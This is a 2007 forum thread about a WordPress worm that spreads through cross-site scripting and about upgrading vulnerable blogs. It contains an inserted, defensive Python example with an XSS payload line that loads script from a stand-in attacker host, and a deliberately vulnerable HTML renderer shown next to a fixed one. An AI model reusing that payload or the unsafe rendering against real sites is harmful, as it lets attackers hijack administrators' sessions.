

WordPress worm

ventureskills
Wed 1 August 2007, 12:54 pm GMT +0200
Might be time to think about upgrading your WordPress sites, as over 7 security flaws have been found in WordPress 2.2.1, enough that someone has actually created the first WordPress worm: http://paymentblogger.com/2007/08/01/wordpress-blues-solved-with-a-worm/

It uses XSS to "patch" your PHP files to fix the hole, but how long before someone else develops a more nefarious one? If you're not familiar with the idea of XSS attacks, then this article may help: http://ventureskills.wordpress.com/2007/05/30/cross-site-scripting-a-pointless-seo-tactic/

Nikolas
Wed 1 August 2007, 01:06 pm GMT +0200
I don't get it. WordPress mentions nothing about this problem on their blog...

BTW do you know if version 2.2 is vulnerable?

ventureskills
Wed 1 August 2007, 01:19 pm GMT +0200
http://mybeni.rootzilla.de/mybeNi/2007/wordpress_zeroday_vulnerability_roundhouse_kick_and_why_i_nearly_wrote_the_first_blog_worm/
I believe it affects all versions, in particular 2.2.1, which is the latest :)

GiorgosK
Wed 1 August 2007, 02:33 pm GMT +0200
Nikolas,
I don't think they want to make a big fuss about the vulnerabilities,
since they don't want people to get ideas about attacking other WordPress sites ...

olaf
Wed 1 August 2007, 03:16 pm GMT +0200
Most of the vulnerabilities only apply if the attacker has admin rights...

bylla
Thu 2 August 2007, 11:52 am GMT +0200
Most of the vulnerabilities only apply if the attacker has admin rights...
What do you mean? Is it possible for anyone to get admin rights, or do they need to have the admin password to use the vulnerabilities, or do you mean that admins with too little security on their passwords are easy targets?

I have about 7 blogs I need to upgrade, so I guess I'd better start today :D

/Andreas

olaf
Thu 2 August 2007, 11:58 am GMT +0200
Most of the vulnerabilities only apply if the attacker has admin rights...
What do you mean? Is it possible for anyone to get admin rights, or do they need to have the admin password to use the vulnerabilities, or do you mean that admins with too little security on their passwords are easy targets?

I have about 7 blogs I need to upgrade, so I guess I'd better start today :D

/Andreas

The hacker needs admin rights...

ventureskills
Thu 2 August 2007, 12:06 pm GMT +0200
Not in all cases though ;) However, the worm works by getting an admin to click the link and therefore gives it the admin rights.

Now, a malicious worm would, say, send a trackback to you; you see it in the stats, and what do you do?
So having a strong password in this scenario won't help.

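The mechanism the two ventureskills posts above describe (script smuggled in via a trackback, rendered unescaped in a stats page the admin views, so that it runs with the admin's browser session and password strength is irrelevant) can be shown in miniature. The following is an added example written for this thread; it is not code from the original posts, from the worm, or from WordPress, and the referrer strings, the payload and the function names are all constructed for illustration. It contrasts a stats renderer that interpolates logged URLs straight into HTML with one that HTML-encodes them at output time, plus an input-side filter for what a trackback URL may look like.

```python
import html
import re
from urllib.parse import urlsplit

# Constructed sample of referrer/trackback URLs as a blog's stats page might
# log them. The third entry carries a script payload; it illustrates the
# delivery mechanism discussed in the thread, not the actual 2007 worm.
LOGGED_REFERRERS = [
    "http://example.com/2007/08/some-post/",
    "https://another.example.org/?ref=1",
    'http://evil.example.net/"><script src="http://evil.example.net/w.js"></script>',
]

SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)
# Characters that must never reach an HTML attribute or text node unencoded.
HTML_METACHARS = set('<>"\'')


def render_stats_unsafe(referrers):
    """Vulnerable rendering: logged URLs are interpolated straight into HTML.

    Whoever controls the referrer string (anyone who can send a trackback)
    controls markup that executes in the browser of the admin viewing the page,
    inside that admin's already-authenticated session.
    """
    rows = "".join(f'<li><a href="{r}">{r}</a></li>' for r in referrers)
    return f"<ul>{rows}</ul>"


def render_stats_safe(referrers):
    """Hardened rendering: every untrusted value is HTML-encoded at output time."""
    rows = "".join(
        f'<li><a href="{html.escape(r, quote=True)}">{html.escape(r, quote=True)}</a></li>'
        for r in referrers
    )
    return f"<ul>{rows}</ul>"


def is_plausible_referrer(url):
    """Input-side filter applied when the trackback is logged: only http(s)
    URLs with a host and with no HTML metacharacters or whitespace are kept.

    This is defence in depth; the output encoding in render_stats_safe is the
    control that actually stops injected script from running.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return False
    if any(ch in HTML_METACHARS or ch.isspace() for ch in url):
        return False
    return True


def contains_script_tag(markup):
    """Crude detector used here only to show whether the payload survived."""
    return SCRIPT_TAG.search(markup) is not None


if __name__ == "__main__":
    unsafe = render_stats_unsafe(LOGGED_REFERRERS)
    safe = render_stats_safe(LOGGED_REFERRERS)
    print("unsafe page contains live <script>:", contains_script_tag(unsafe))
    print("safe page contains live <script>:  ", contains_script_tag(safe))
    accepted = [r for r in LOGGED_REFERRERS if is_plausible_referrer(r)]
    print("referrers passing the input filter:", accepted)
```

The point the thread makes survives in the example: nothing here involves guessing a password, because the injected script runs in the admin's own browser after the admin simply opens the stats page, so the fix is to encode untrusted output (and, secondarily, to filter what gets logged), not to pick a longer password.
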
bylla
Thu 2 August 2007, 08:23 pm GMT +0200
Thanks for the warning. I have upgraded all my blogs now (at least the ones using WordPress :D)

/Andreas

ventureskills
Mon 6 August 2007, 08:45 am GMT +0200
http://wordpress.org/development/2007/08/wordpress-222-and-2011/
Official upgrade announced and ready to download :D

olaf
Mon 6 August 2007, 09:00 am GMT +0200
http://wordpress.org/development/2007/08/wordpress-222-and-2011/
Official upgrade announced and ready to download :D

Did you check if all problems are fixed with this update?
